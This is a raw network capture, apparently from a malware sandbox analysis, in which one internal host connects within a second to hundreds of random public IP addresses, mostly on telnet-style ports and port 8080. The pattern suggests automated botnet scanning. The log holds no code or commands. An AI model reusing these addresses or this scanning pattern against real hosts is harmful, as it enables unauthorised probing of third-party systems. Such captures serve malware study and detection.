                                                        Feb 14, 2024 09:32:42.798719883 CET3332323192.168.2.1471.15.128.150
                                                        Feb 14, 2024 09:32:42.798733950 CET3332323192.168.2.14164.159.211.245
                                                        Feb 14, 2024 09:32:42.798737049 CET407478080192.168.2.1485.150.179.219
                                                        Feb 14, 2024 09:32:42.798737049 CET3332323192.168.2.14144.164.118.209
                                                        Feb 14, 2024 09:32:42.798752069 CET3332323192.168.2.14137.158.138.124
                                                        Feb 14, 2024 09:32:42.798752069 CET3332323192.168.2.14197.226.146.61
                                                        Feb 14, 2024 09:32:42.798753023 CET3332323192.168.2.14105.120.233.99
                                                        Feb 14, 2024 09:32:42.798753023 CET3332323192.168.2.149.144.98.136
                                                        Feb 14, 2024 09:32:42.798753023 CET3332323192.168.2.14132.70.253.217
                                                        Feb 14, 2024 09:32:42.798759937 CET407478080192.168.2.1462.89.30.228
                                                        Feb 14, 2024 09:32:42.798770905 CET333232323192.168.2.1481.62.18.80
                                                        Feb 14, 2024 09:32:42.798770905 CET3332323192.168.2.14130.189.111.243
                                                        Feb 14, 2024 09:32:42.798772097 CET3332323192.168.2.14194.148.155.221
                                                        Feb 14, 2024 09:32:42.798779011 CET3332323192.168.2.14210.171.142.205
                                                        Feb 14, 2024 09:32:42.798770905 CET407478080192.168.2.1494.57.79.61
                                                        Feb 14, 2024 09:32:42.798784971 CET3332323192.168.2.14213.130.137.112
                                                        Feb 14, 2024 09:32:42.798805952 CET407478080192.168.2.1485.149.164.144
                                                        Feb 14, 2024 09:32:42.798806906 CET3332323192.168.2.14137.172.249.118
                                                        Feb 14, 2024 09:32:42.798806906 CET3332323192.168.2.14140.220.37.25
                                                        Feb 14, 2024 09:32:42.798806906 CET3332323192.168.2.1468.130.16.188
                                                        Feb 14, 2024 09:32:42.798820972 CET407478080192.168.2.1494.251.91.236
                                                        Feb 14, 2024 09:32:42.798825026 CET407478080192.168.2.1431.100.219.251
                                                        Feb 14, 2024 09:32:42.798825979 CET3332323192.168.2.1465.46.159.83
                                                        Feb 14, 2024 09:32:42.798826933 CET3332323192.168.2.14150.211.51.158
                                                        Feb 14, 2024 09:32:42.798829079 CET407478080192.168.2.1485.54.21.228
                                                        Feb 14, 2024 09:32:42.798836946 CET333232323192.168.2.148.196.85.97
                                                        Feb 14, 2024 09:32:42.798840046 CET3332323192.168.2.14103.115.95.31
                                                        Feb 14, 2024 09:32:42.798841000 CET3332323192.168.2.14111.175.230.229
                                                        Feb 14, 2024 09:32:42.798841000 CET3332323192.168.2.1417.60.111.8
                                                        Feb 14, 2024 09:32:42.798845053 CET3332323192.168.2.1452.77.215.232
                                                        Feb 14, 2024 09:32:42.798849106 CET407478080192.168.2.1485.154.153.118
                                                        Feb 14, 2024 09:32:42.798852921 CET407478080192.168.2.1431.33.157.207
                                                        Feb 14, 2024 09:32:42.798861027 CET3332323192.168.2.1457.232.62.240
                                                        Feb 14, 2024 09:32:42.798862934 CET407478080192.168.2.1485.38.230.208
                                                        Feb 14, 2024 09:32:42.798865080 CET407478080192.168.2.1485.143.45.203
                                                        Feb 14, 2024 09:32:42.798880100 CET407478080192.168.2.1485.185.236.56
                                                        Feb 14, 2024 09:32:42.798882008 CET3332323192.168.2.14137.192.164.74
                                                        Feb 14, 2024 09:32:42.798882008 CET3332323192.168.2.1449.60.84.63
                                                        Feb 14, 2024 09:32:42.798885107 CET3332323192.168.2.1442.6.67.50
                                                        Feb 14, 2024 09:32:42.798885107 CET3332323192.168.2.14174.0.220.250
                                                        Feb 14, 2024 09:32:42.798887968 CET333232323192.168.2.14175.87.253.79
                                                        Feb 14, 2024 09:32:42.798898935 CET3332323192.168.2.1460.177.134.202
                                                        Feb 14, 2024 09:32:42.798898935 CET3332323192.168.2.142.43.95.72
                                                        Feb 14, 2024 09:32:42.798901081 CET3332323192.168.2.1436.50.111.142
                                                        Feb 14, 2024 09:32:42.798902988 CET407478080192.168.2.1495.209.111.82
                                                        Feb 14, 2024 09:32:42.798918962 CET3332323192.168.2.14152.232.157.101
                                                        Feb 14, 2024 09:32:42.798918962 CET407478080192.168.2.1494.100.204.35
                                                        Feb 14, 2024 09:32:42.798918962 CET407478080192.168.2.1494.52.225.200
                                                        Feb 14, 2024 09:32:42.798918962 CET407478080192.168.2.1485.156.5.22
                                                        Feb 14, 2024 09:32:42.798924923 CET3332323192.168.2.14141.227.34.235
                                                        Feb 14, 2024 09:32:42.798928022 CET407478080192.168.2.1431.164.56.234
                                                        Feb 14, 2024 09:32:42.798928022 CET3332323192.168.2.14173.183.161.235
                                                        Feb 14, 2024 09:32:42.798940897 CET3332323192.168.2.1431.107.238.83
                                                        Feb 14, 2024 09:32:42.798948050 CET3332323192.168.2.1458.199.32.118
                                                        Feb 14, 2024 09:32:42.798949957 CET3332323192.168.2.14161.196.68.70
                                                        Feb 14, 2024 09:32:42.798949957 CET407478080192.168.2.1494.212.152.5
                                                        Feb 14, 2024 09:32:42.798964024 CET3332323192.168.2.1489.20.25.159
                                                        Feb 14, 2024 09:32:42.798964024 CET407478080192.168.2.1495.52.22.118
                                                        Feb 14, 2024 09:32:42.798965931 CET407478080192.168.2.1462.17.249.169
                                                        Feb 14, 2024 09:32:42.798969984 CET407478080192.168.2.1485.41.32.53
                                                        Feb 14, 2024 09:32:42.798983097 CET3332323192.168.2.14208.75.156.99
                                                        Feb 14, 2024 09:32:42.798986912 CET407478080192.168.2.1431.118.210.117
                                                        Feb 14, 2024 09:32:42.798986912 CET333232323192.168.2.14222.27.100.14
                                                        Feb 14, 2024 09:32:42.798986912 CET407478080192.168.2.1485.141.203.52
                                                        Feb 14, 2024 09:32:42.799000978 CET407478080192.168.2.1431.155.183.89
                                                        Feb 14, 2024 09:32:42.799004078 CET407478080192.168.2.1494.228.119.70
                                                        Feb 14, 2024 09:32:42.799005032 CET407478080192.168.2.1495.41.181.166
                                                        Feb 14, 2024 09:32:42.799012899 CET3332323192.168.2.14132.78.194.91
                                                        Feb 14, 2024 09:32:42.799012899 CET3332323192.168.2.14159.82.246.227
                                                        Feb 14, 2024 09:32:42.799015045 CET3332323192.168.2.14133.39.138.122
                                                        Feb 14, 2024 09:32:42.799032927 CET3332323192.168.2.144.133.18.111
                                                        Feb 14, 2024 09:32:42.799036026 CET407478080192.168.2.1495.215.169.172
                                                        Feb 14, 2024 09:32:42.799034119 CET3332323192.168.2.14146.95.196.245
                                                        Feb 14, 2024 09:32:42.799036026 CET407478080192.168.2.1485.207.170.46
                                                        Feb 14, 2024 09:32:42.799034119 CET3332323192.168.2.14164.85.229.58
                                                        Feb 14, 2024 09:32:42.799032927 CET3332323192.168.2.14121.60.175.205
                                                        Feb 14, 2024 09:32:42.799041033 CET3332323192.168.2.14170.180.220.180
                                                        Feb 14, 2024 09:32:42.799060106 CET333232323192.168.2.14187.164.225.9
                                                        Feb 14, 2024 09:32:42.799060106 CET407478080192.168.2.1431.192.55.94
                                                        Feb 14, 2024 09:32:42.799060106 CET407478080192.168.2.1494.245.21.51
                                                        Feb 14, 2024 09:32:42.799062967 CET3332323192.168.2.1427.217.74.106
                                                        Feb 14, 2024 09:32:42.799074888 CET407478080192.168.2.1485.130.63.185
                                                        Feb 14, 2024 09:32:42.799074888 CET3332323192.168.2.1418.141.142.73
                                                        Feb 14, 2024 09:32:42.799076080 CET407478080192.168.2.1494.37.208.94
                                                        Feb 14, 2024 09:32:42.799087048 CET3332323192.168.2.14133.167.171.172
                                                        Feb 14, 2024 09:32:42.799088001 CET407478080192.168.2.1462.243.221.125
                                                        Feb 14, 2024 09:32:42.799094915 CET407478080192.168.2.1485.118.239.203
                                                        Feb 14, 2024 09:32:42.799109936 CET407478080192.168.2.1462.126.132.157
                                                        Feb 14, 2024 09:32:42.799113989 CET407478080192.168.2.1431.32.176.218
                                                        Feb 14, 2024 09:32:42.799115896 CET407478080192.168.2.1462.234.247.26
                                                        Feb 14, 2024 09:32:42.799115896 CET407478080192.168.2.1431.149.158.235
                                                        Feb 14, 2024 09:32:42.799143076 CET407478080192.168.2.1494.100.94.215
                                                        Feb 14, 2024 09:32:42.799141884 CET407478080192.168.2.1431.72.3.211
                                                        Feb 14, 2024 09:32:42.799150944 CET407478080192.168.2.1495.45.43.71
                                                        Feb 14, 2024 09:32:42.799150944 CET407478080192.168.2.1462.103.158.202
                                                        Feb 14, 2024 09:32:42.799158096 CET407478080192.168.2.1462.205.192.37
                                                        Feb 14, 2024 09:32:42.799166918 CET407478080192.168.2.1485.91.123.90
                                                        Feb 14, 2024 09:32:42.799166918 CET407478080192.168.2.1494.101.146.229
                                                        Feb 14, 2024 09:32:42.799185991 CET407478080192.168.2.1494.72.182.129
                                                        Feb 14, 2024 09:32:42.799185991 CET407478080192.168.2.1462.135.121.52
                                                        Feb 14, 2024 09:32:42.799225092 CET407478080192.168.2.1431.201.12.148
                                                        Feb 14, 2024 09:32:42.799236059 CET407478080192.168.2.1431.171.226.130
                                                        Feb 14, 2024 09:32:42.799236059 CET407478080192.168.2.1485.235.31.180
                                                        Feb 14, 2024 09:32:42.799236059 CET407478080192.168.2.1494.127.200.172
                                                        Feb 14, 2024 09:32:42.799236059 CET407478080192.168.2.1462.163.180.103
                                                        Feb 14, 2024 09:32:42.799238920 CET407478080192.168.2.1485.128.52.39
                                                        Feb 14, 2024 09:32:42.799241066 CET407478080192.168.2.1431.163.221.57
                                                        Feb 14, 2024 09:32:42.799256086 CET407478080192.168.2.1485.179.228.4
                                                        Feb 14, 2024 09:32:42.799257994 CET407478080192.168.2.1495.253.254.164
                                                        Feb 14, 2024 09:32:42.799274921 CET407478080192.168.2.1494.111.31.249
                                                        Feb 14, 2024 09:32:42.799284935 CET407478080192.168.2.1431.152.103.97
                                                        Feb 14, 2024 09:32:42.799284935 CET407478080192.168.2.1495.88.171.44
                                                        Feb 14, 2024 09:32:42.799308062 CET407478080192.168.2.1462.215.251.152
                                                        Feb 14, 2024 09:32:42.799314976 CET407478080192.168.2.1462.167.162.22
                                                        Feb 14, 2024 09:32:42.799324989 CET407478080192.168.2.1494.207.212.157
                                                        Feb 14, 2024 09:32:42.799324989 CET407478080192.168.2.1485.253.113.205
                                                        Feb 14, 2024 09:32:42.799335957 CET407478080192.168.2.1462.151.168.181
                                                        Feb 14, 2024 09:32:42.799340010 CET407478080192.168.2.1462.202.246.65
                                                        Feb 14, 2024 09:32:42.799340010 CET407478080192.168.2.1431.128.134.158
                                                        Feb 14, 2024 09:32:42.799345016 CET407478080192.168.2.1495.212.86.98
                                                        Feb 14, 2024 09:32:42.799356937 CET407478080192.168.2.1462.173.241.142
                                                        Feb 14, 2024 09:32:42.799361944 CET407478080192.168.2.1494.219.40.100
                                                        Feb 14, 2024 09:32:42.799364090 CET407478080192.168.2.1485.39.47.225
                                                        Feb 14, 2024 09:32:42.799377918 CET407478080192.168.2.1494.162.98.41
                                                        Feb 14, 2024 09:32:42.799395084 CET407478080192.168.2.1431.248.131.173
                                                        Feb 14, 2024 09:32:42.799396038 CET407478080192.168.2.1462.209.110.209
                                                        Feb 14, 2024 09:32:42.799395084 CET407478080192.168.2.1494.253.238.31
                                                        Feb 14, 2024 09:32:42.799422026 CET407478080192.168.2.1431.219.225.152
                                                        Feb 14, 2024 09:32:42.799428940 CET407478080192.168.2.1495.16.17.79
                                                        Feb 14, 2024 09:32:42.799436092 CET407478080192.168.2.1485.184.77.128
                                                        Feb 14, 2024 09:32:42.799437046 CET407478080192.168.2.1462.224.86.35
                                                        Feb 14, 2024 09:32:42.799437046 CET407478080192.168.2.1431.110.131.253
                                                        Feb 14, 2024 09:32:42.799437046 CET407478080192.168.2.1431.197.76.56
                                                        Feb 14, 2024 09:32:42.799437046 CET407478080192.168.2.1431.138.85.126
                                                        Feb 14, 2024 09:32:42.799437046 CET407478080192.168.2.1462.92.163.198
                                                        Feb 14, 2024 09:32:42.799453020 CET407478080192.168.2.1494.170.36.80
                                                        Feb 14, 2024 09:32:42.799455881 CET407478080192.168.2.1494.167.199.44
                                                        Feb 14, 2024 09:32:42.799459934 CET407478080192.168.2.1431.33.86.185
                                                        Feb 14, 2024 09:32:42.799467087 CET407478080192.168.2.1485.217.95.234
                                                        Feb 14, 2024 09:32:42.799484968 CET407478080192.168.2.1485.25.41.78
                                                        Feb 14, 2024 09:32:42.799509048 CET407478080192.168.2.1485.158.68.181
                                                        Feb 14, 2024 09:32:42.799509048 CET407478080192.168.2.1485.246.217.243
                                                        Feb 14, 2024 09:32:42.799521923 CET407478080192.168.2.1462.9.94.110
                                                        Feb 14, 2024 09:32:42.799521923 CET407478080192.168.2.1494.253.166.192
                                                        Feb 14, 2024 09:32:42.799521923 CET407478080192.168.2.1494.226.95.12
                                                        Feb 14, 2024 09:32:42.799544096 CET407478080192.168.2.1494.140.202.63
                                                        Feb 14, 2024 09:32:42.799552917 CET407478080192.168.2.1431.164.107.129
                                                        Feb 14, 2024 09:32:42.799571037 CET407478080192.168.2.1495.158.229.64
                                                        Feb 14, 2024 09:32:42.799573898 CET407478080192.168.2.1495.107.24.44
                                                        Feb 14, 2024 09:32:42.799576998 CET407478080192.168.2.1495.73.162.190
                                                        Feb 14, 2024 09:32:42.799576998 CET407478080192.168.2.1462.157.177.187
                                                        Feb 14, 2024 09:32:42.799593925 CET407478080192.168.2.1494.217.136.206
                                                        Feb 14, 2024 09:32:42.799618006 CET407478080192.168.2.1462.228.191.37
                                                        Feb 14, 2024 09:32:42.799628019 CET407478080192.168.2.1485.146.218.108
                                                        Feb 14, 2024 09:32:42.799628019 CET407478080192.168.2.1431.245.32.125
                                                        Feb 14, 2024 09:32:42.799628019 CET407478080192.168.2.1462.41.157.119
                                                        Feb 14, 2024 09:32:42.799640894 CET407478080192.168.2.1494.155.6.7
                                                        Feb 14, 2024 09:32:42.799674988 CET407478080192.168.2.1485.106.41.24
                                                        Feb 14, 2024 09:32:42.799674988 CET407478080192.168.2.1431.50.224.248
                                                        Feb 14, 2024 09:32:42.799675941 CET407478080192.168.2.1494.198.141.55
                                                        Feb 14, 2024 09:32:42.799690008 CET407478080192.168.2.1485.86.158.108
                                                        Feb 14, 2024 09:32:42.799709082 CET407478080192.168.2.1431.83.8.91
                                                        Feb 14, 2024 09:32:42.799716949 CET407478080192.168.2.1495.173.182.206
                                                        Feb 14, 2024 09:32:42.799721956 CET407478080192.168.2.1494.44.116.162
                                                        Feb 14, 2024 09:32:42.799736977 CET407478080192.168.2.1495.151.33.219
                                                        Feb 14, 2024 09:32:42.799741983 CET407478080192.168.2.1495.43.141.70
                                                        Feb 14, 2024 09:32:42.799751043 CET407478080192.168.2.1495.177.9.111
                                                        Feb 14, 2024 09:32:42.799765110 CET407478080192.168.2.1495.70.136.59
                                                        Feb 14, 2024 09:32:42.799781084 CET407478080192.168.2.1485.253.202.119
                                                        Feb 14, 2024 09:32:42.799781084 CET407478080192.168.2.1495.207.170.91
                                                        Feb 14, 2024 09:32:42.799794912 CET407478080192.168.2.1495.202.209.178
                                                        Feb 14, 2024 09:32:42.799797058 CET407478080192.168.2.1431.187.179.181
                                                        Feb 14, 2024 09:32:42.799803972 CET407478080192.168.2.1485.200.150.189
                                                        Feb 14, 2024 09:32:42.799808979 CET407478080192.168.2.1462.56.109.117
                                                        Feb 14, 2024 09:32:42.799808979 CET407478080192.168.2.1485.144.16.109
                                                        Feb 14, 2024 09:32:42.799815893 CET407478080192.168.2.1494.153.88.175
                                                        Feb 14, 2024 09:32:42.799829960 CET407478080192.168.2.1485.126.31.29
                                                        Feb 14, 2024 09:32:42.799839973 CET407478080192.168.2.1495.242.69.42
                                                        Feb 14, 2024 09:32:42.799849987 CET407478080192.168.2.1494.151.133.206
                                                        Feb 14, 2024 09:32:42.799850941 CET407478080192.168.2.1495.48.0.75
                                                        Feb 14, 2024 09:32:42.799855947 CET407478080192.168.2.1431.27.161.9
                                                        Feb 14, 2024 09:32:42.799860954 CET407478080192.168.2.1431.54.173.159
                                                        Feb 14, 2024 09:32:42.799864054 CET407478080192.168.2.1485.208.91.188
                                                        Feb 14, 2024 09:32:42.799876928 CET407478080192.168.2.1431.29.201.232
                                                        Feb 14, 2024 09:32:42.799885035 CET407478080192.168.2.1495.42.38.5
                                                        Feb 14, 2024 09:32:42.799885035 CET407478080192.168.2.1495.244.192.72
                                                        Feb 14, 2024 09:32:42.799896955 CET407478080192.168.2.1462.238.215.100
                                                        Feb 14, 2024 09:32:42.799917936 CET407478080192.168.2.1495.9.227.88
                                                        Feb 14, 2024 09:32:42.799918890 CET407478080192.168.2.1495.180.31.158
                                                        Feb 14, 2024 09:32:42.799927950 CET407478080192.168.2.1494.121.18.114
                                                        Feb 14, 2024 09:32:42.799937010 CET407478080192.168.2.1485.33.115.91
                                                        Feb 14, 2024 09:32:42.799948931 CET407478080192.168.2.1431.232.39.77
                                                        Feb 14, 2024 09:32:42.799956083 CET407478080192.168.2.1485.230.249.157
                                                        Feb 14, 2024 09:32:42.799957991 CET407478080192.168.2.1485.140.209.248
                                                        Feb 14, 2024 09:32:42.799978018 CET407478080192.168.2.1495.25.241.167
                                                        Feb 14, 2024 09:32:42.799989939 CET407478080192.168.2.1485.205.149.224
                                                        Feb 14, 2024 09:32:42.799997091 CET407478080192.168.2.1431.40.65.81
                                                        Feb 14, 2024 09:32:42.800004005 CET407478080192.168.2.1495.91.156.66
                                                        Feb 14, 2024 09:32:42.800007105 CET407478080192.168.2.1431.162.135.156
                                                        Feb 14, 2024 09:32:42.800024986 CET407478080192.168.2.1431.247.229.157
                                                        Feb 14, 2024 09:32:42.800029993 CET407478080192.168.2.1462.237.169.66
                                                        Feb 14, 2024 09:32:42.800033092 CET407478080192.168.2.1431.163.89.55
                                                        Feb 14, 2024 09:32:42.800040007 CET407478080192.168.2.1494.118.198.92
                                                        Feb 14, 2024 09:32:42.800044060 CET407478080192.168.2.1431.231.180.182
                                                        Feb 14, 2024 09:32:42.800059080 CET407478080192.168.2.1462.207.94.131
                                                        Feb 14, 2024 09:32:42.800060034 CET407478080192.168.2.1431.244.49.3
                                                        Feb 14, 2024 09:32:42.800067902 CET407478080192.168.2.1494.182.22.208
                                                        Feb 14, 2024 09:32:42.800082922 CET407478080192.168.2.1462.194.25.55
                                                        Feb 14, 2024 09:32:42.800082922 CET407478080192.168.2.1431.2.95.195
                                                        Feb 14, 2024 09:32:42.800085068 CET407478080192.168.2.1485.212.41.48
                                                        Feb 14, 2024 09:32:42.800096989 CET407478080192.168.2.1462.14.244.83
                                                        Feb 14, 2024 09:32:42.800096989 CET407478080192.168.2.1462.238.129.129
                                                        Feb 14, 2024 09:32:42.800107002 CET407478080192.168.2.1462.93.17.92
                                                        Feb 14, 2024 09:32:42.800120115 CET407478080192.168.2.1431.108.236.51
                                                        Feb 14, 2024 09:32:42.800123930 CET407478080192.168.2.1431.170.47.140
                                                        Feb 14, 2024 09:32:42.800137997 CET407478080192.168.2.1494.58.54.206
                                                        Feb 14, 2024 09:32:42.800137997 CET407478080192.168.2.1485.8.202.76
                                                        Feb 14, 2024 09:32:42.800148010 CET407478080192.168.2.1494.248.50.12
                                                        Feb 14, 2024 09:32:42.800148010 CET407478080192.168.2.1495.140.107.160
                                                        Feb 14, 2024 09:32:42.800159931 CET407478080192.168.2.1462.38.139.33
                                                        Feb 14, 2024 09:32:42.800160885 CET407478080192.168.2.1494.52.17.13
                                                        Feb 14, 2024 09:32:42.800174952 CET407478080192.168.2.1462.141.145.153
                                                        Feb 14, 2024 09:32:42.800184965 CET407478080192.168.2.1462.202.154.170
                                                        Feb 14, 2024 09:32:42.800205946 CET407478080192.168.2.1462.24.3.148
                                                        Feb 14, 2024 09:32:42.800205946 CET407478080192.168.2.1431.248.115.210
                                                        Feb 14, 2024 09:32:42.800208092 CET407478080192.168.2.1485.125.139.191
                                                        Feb 14, 2024 09:32:42.800216913 CET407478080192.168.2.1462.197.69.132
                                                        Feb 14, 2024 09:32:42.800230026 CET407478080192.168.2.1462.207.78.219
                                                        Feb 14, 2024 09:32:42.800231934 CET407478080192.168.2.1485.43.227.201
                                                        Feb 14, 2024 09:32:42.800239086 CET407478080192.168.2.1495.99.46.205
                                                        Feb 14, 2024 09:32:42.800246000 CET407478080192.168.2.1494.231.83.41
                                                        Feb 14, 2024 09:32:42.800256014 CET407478080192.168.2.1495.116.149.80
                                                        Feb 14, 2024 09:32:42.800276995 CET407478080192.168.2.1494.6.231.32
                                                        Feb 14, 2024 09:32:42.800278902 CET407478080192.168.2.1462.28.128.135
                                                        Feb 14, 2024 09:32:42.800282955 CET407478080192.168.2.1431.206.41.187
                                                        Feb 14, 2024 09:32:42.800287008 CET407478080192.168.2.1431.102.246.96
                                                        Feb 14, 2024 09:32:42.800297022 CET407478080192.168.2.1485.37.207.224
                                                        Feb 14, 2024 09:32:42.800316095 CET407478080192.168.2.1494.195.72.227
                                                        Feb 14, 2024 09:32:42.800318003 CET407478080192.168.2.1462.216.3.117
                                                        Feb 14, 2024 09:32:42.800333977 CET407478080192.168.2.1462.156.38.24
                                                        Feb 14, 2024 09:32:42.800338984 CET407478080192.168.2.1485.33.185.58
                                                        Feb 14, 2024 09:32:42.800343990 CET407478080192.168.2.1495.144.27.38
                                                        Feb 14, 2024 09:32:42.800350904 CET407478080192.168.2.1485.47.196.194
                                                        Feb 14, 2024 09:32:42.800369978 CET407478080192.168.2.1485.12.142.255
                                                        Feb 14, 2024 09:32:42.800374031 CET407478080192.168.2.1431.149.0.128
                                                        Feb 14, 2024 09:32:42.800374985 CET407478080192.168.2.1485.179.24.185
                                                        Feb 14, 2024 09:32:42.800383091 CET407478080192.168.2.1462.244.142.161
                                                        Feb 14, 2024 09:32:42.800388098 CET407478080192.168.2.1431.178.214.78
                                                        Feb 14, 2024 09:32:42.800395012 CET407478080192.168.2.1431.196.245.1
                                                        Feb 14, 2024 09:32:42.800394058 CET407478080192.168.2.1431.109.77.253
                                                        Feb 14, 2024 09:32:42.800410986 CET407478080192.168.2.1494.147.137.213
                                                        Feb 14, 2024 09:32:42.800411940 CET407478080192.168.2.1462.22.53.250
                                                        Feb 14, 2024 09:32:42.800416946 CET407478080192.168.2.1494.236.49.15
                                                        Feb 14, 2024 09:32:42.800421000 CET407478080192.168.2.1495.140.75.54
                                                        Feb 14, 2024 09:32:42.800441980 CET407478080192.168.2.1495.80.242.234
                                                        Feb 14, 2024 09:32:42.800441980 CET407478080192.168.2.1494.215.183.15
                                                        Feb 14, 2024 09:32:42.800446987 CET407478080192.168.2.1485.89.206.228
                                                        Feb 14, 2024 09:32:42.800461054 CET407478080192.168.2.1462.213.50.203
                                                        Feb 14, 2024 09:32:42.800467014 CET407478080192.168.2.1485.84.170.64
                                                        Feb 14, 2024 09:32:42.800481081 CET407478080192.168.2.1494.196.183.226
                                                        Feb 14, 2024 09:32:42.800497055 CET407478080192.168.2.1485.199.28.101
                                                        Feb 14, 2024 09:32:42.800506115 CET407478080192.168.2.1494.224.171.39
                                                        Feb 14, 2024 09:32:42.800513029 CET407478080192.168.2.1494.49.82.250
                                                        Feb 14, 2024 09:32:42.800529003 CET407478080192.168.2.1485.25.167.15
                                                        Feb 14, 2024 09:32:42.800539017 CET407478080192.168.2.1485.11.38.87
                                                        Feb 14, 2024 09:32:42.800539017 CET407478080192.168.2.1495.215.24.248
                                                        Feb 14, 2024 09:32:42.800551891 CET407478080192.168.2.1495.39.123.241
                                                        Feb 14, 2024 09:32:42.800553083 CET407478080192.168.2.1495.212.168.47
                                                        Feb 14, 2024 09:32:42.800561905 CET407478080192.168.2.1462.50.65.43
                                                        Feb 14, 2024 09:32:42.800561905 CET407478080192.168.2.1494.89.174.86
                                                        Feb 14, 2024 09:32:42.800580978 CET407478080192.168.2.1431.64.116.77
                                                        Feb 14, 2024 09:32:42.800580978 CET407478080192.168.2.1431.8.151.198
                                                        Feb 14, 2024 09:32:42.800605059 CET407478080192.168.2.1431.114.131.250
                                                        Feb 14, 2024 09:32:42.800605059 CET407478080192.168.2.1431.202.188.107
                                                        Feb 14, 2024 09:32:42.800620079 CET407478080192.168.2.1495.63.146.94
                                                        Feb 14, 2024 09:32:42.800626993 CET407478080192.168.2.1494.130.153.123
                                                        Feb 14, 2024 09:32:42.800633907 CET407478080192.168.2.1485.211.67.49
                                                        Feb 14, 2024 09:32:42.800640106 CET407478080192.168.2.1462.226.3.149
                                                        Feb 14, 2024 09:32:42.800662041 CET407478080192.168.2.1462.219.252.65
                                                        Feb 14, 2024 09:32:42.800666094 CET407478080192.168.2.1495.200.206.161
                                                        Feb 14, 2024 09:32:42.800682068 CET407478080192.168.2.1495.163.18.199
                                                        Feb 14, 2024 09:32:42.800682068 CET407478080192.168.2.1495.84.232.194
                                                        Feb 14, 2024 09:32:42.800684929 CET407478080192.168.2.1485.56.75.55
                                                        Feb 14, 2024 09:32:42.800704956 CET407478080192.168.2.1495.93.103.84
                                                        Feb 14, 2024 09:32:42.800705910 CET407478080192.168.2.1431.99.216.137
                                                        Feb 14, 2024 09:32:42.800709963 CET407478080192.168.2.1485.19.82.20
                                                        Feb 14, 2024 09:32:42.800710917 CET407478080192.168.2.1485.202.228.34
                                                        Feb 14, 2024 09:32:42.800717115 CET407478080192.168.2.1494.233.137.156
                                                        Feb 14, 2024 09:32:42.800738096 CET407478080192.168.2.1431.178.69.192
                                                        Feb 14, 2024 09:32:42.800738096 CET407478080192.168.2.1485.62.81.27
                                                        Feb 14, 2024 09:32:42.800739050 CET407478080192.168.2.1485.166.21.107
                                                        Feb 14, 2024 09:32:42.800740004 CET407478080192.168.2.1495.168.49.111
                                                        Feb 14, 2024 09:32:42.800740957 CET407478080192.168.2.1431.219.247.84
                                                        Feb 14, 2024 09:32:42.800741911 CET407478080192.168.2.1494.224.124.114
                                                        Feb 14, 2024 09:32:42.800741911 CET407478080192.168.2.1431.91.83.1
                                                        Feb 14, 2024 09:32:42.800741911 CET407478080192.168.2.1462.0.35.81
                                                        Feb 14, 2024 09:32:42.800756931 CET407478080192.168.2.1494.225.107.158
                                                        Feb 14, 2024 09:32:42.800761938 CET407478080192.168.2.1431.208.165.27
                                                        Feb 14, 2024 09:32:42.800775051 CET407478080192.168.2.1462.176.137.124
                                                        Feb 14, 2024 09:32:42.800775051 CET407478080192.168.2.1495.57.30.192
                                                        Feb 14, 2024 09:32:42.800777912 CET407478080192.168.2.1495.227.180.190
                                                        Feb 14, 2024 09:32:42.800780058 CET407478080192.168.2.1495.201.205.30
                                                        Feb 14, 2024 09:32:42.800782919 CET407478080192.168.2.1495.163.5.119
                                                        Feb 14, 2024 09:32:42.800796032 CET407478080192.168.2.1462.65.204.165
                                                        Feb 14, 2024 09:32:42.800796986 CET407478080192.168.2.1494.39.118.106
                                                        Feb 14, 2024 09:32:42.800825119 CET407478080192.168.2.1495.61.79.118
                                                        Feb 14, 2024 09:32:42.800841093 CET407478080192.168.2.1494.64.243.216
                                                        Feb 14, 2024 09:32:42.800841093 CET407478080192.168.2.1431.30.179.155
                                                        Feb 14, 2024 09:32:42.800843954 CET407478080192.168.2.1462.123.176.116
                                                        Feb 14, 2024 09:32:42.800868988 CET407478080192.168.2.1495.51.141.176
                                                        Feb 14, 2024 09:32:42.800880909 CET407478080192.168.2.1494.102.11.0
                                                        Feb 14, 2024 09:32:42.800884008 CET407478080192.168.2.1494.151.16.18
                                                        Feb 14, 2024 09:32:42.800892115 CET407478080192.168.2.1495.154.28.102
                                                        Feb 14, 2024 09:32:42.800904036 CET407478080192.168.2.1494.89.192.168
                                                        Feb 14, 2024 09:32:42.800904989 CET407478080192.168.2.1485.194.163.6
                                                        Feb 14, 2024 09:32:42.800915956 CET407478080192.168.2.1462.60.249.126
                                                        Feb 14, 2024 09:32:42.800915956 CET407478080192.168.2.1494.129.214.222
                                                        Feb 14, 2024 09:32:42.800925016 CET407478080192.168.2.1485.8.183.19
                                                        Feb 14, 2024 09:32:42.800925016 CET407478080192.168.2.1495.27.86.151
                                                        Feb 14, 2024 09:32:42.800928116 CET407478080192.168.2.1462.55.111.218
                                                        Feb 14, 2024 09:32:42.800932884 CET407478080192.168.2.1495.229.59.8
                                                        Feb 14, 2024 09:32:42.800951004 CET407478080192.168.2.1485.182.165.78
                                                        Feb 14, 2024 09:32:42.800951004 CET407478080192.168.2.1462.90.7.144
                                                        Feb 14, 2024 09:32:42.800966024 CET407478080192.168.2.1494.80.202.201
                                                        Feb 14, 2024 09:32:42.800978899 CET407478080192.168.2.1494.123.78.59
                                                        Feb 14, 2024 09:32:42.800998926 CET407478080192.168.2.1495.33.89.193
                                                        Feb 14, 2024 09:32:42.801007032 CET407478080192.168.2.1494.191.83.177
                                                        Feb 14, 2024 09:32:42.801023006 CET407478080192.168.2.1462.151.69.61
                                                        Feb 14, 2024 09:32:42.801028013 CET407478080192.168.2.1485.208.79.31
                                                        Feb 14, 2024 09:32:42.801027060 CET407478080192.168.2.1494.171.167.217
                                                        Feb 14, 2024 09:32:42.801028967 CET407478080192.168.2.1495.202.153.148
                                                        Feb 14, 2024 09:32:42.801035881 CET407478080192.168.2.1485.36.228.23
                                                        Feb 14, 2024 09:32:42.801043987 CET407478080192.168.2.1431.94.29.106
                                                        Feb 14, 2024 09:32:42.801047087 CET407478080192.168.2.1494.178.113.60
                                                        Feb 14, 2024 09:32:42.801059008 CET407478080192.168.2.1462.141.203.229
                                                        Feb 14, 2024 09:32:42.801078081 CET407478080192.168.2.1431.129.10.159
                                                        Feb 14, 2024 09:32:42.801084995 CET407478080192.168.2.1462.54.16.245
                                                        Feb 14, 2024 09:32:42.801100969 CET407478080192.168.2.1494.130.128.129
                                                        Feb 14, 2024 09:32:42.801116943 CET407478080192.168.2.1494.128.95.93
                                                        Feb 14, 2024 09:32:42.801120996 CET407478080192.168.2.1462.116.201.71
                                                        Feb 14, 2024 09:32:42.801127911 CET407478080192.168.2.1494.166.24.171
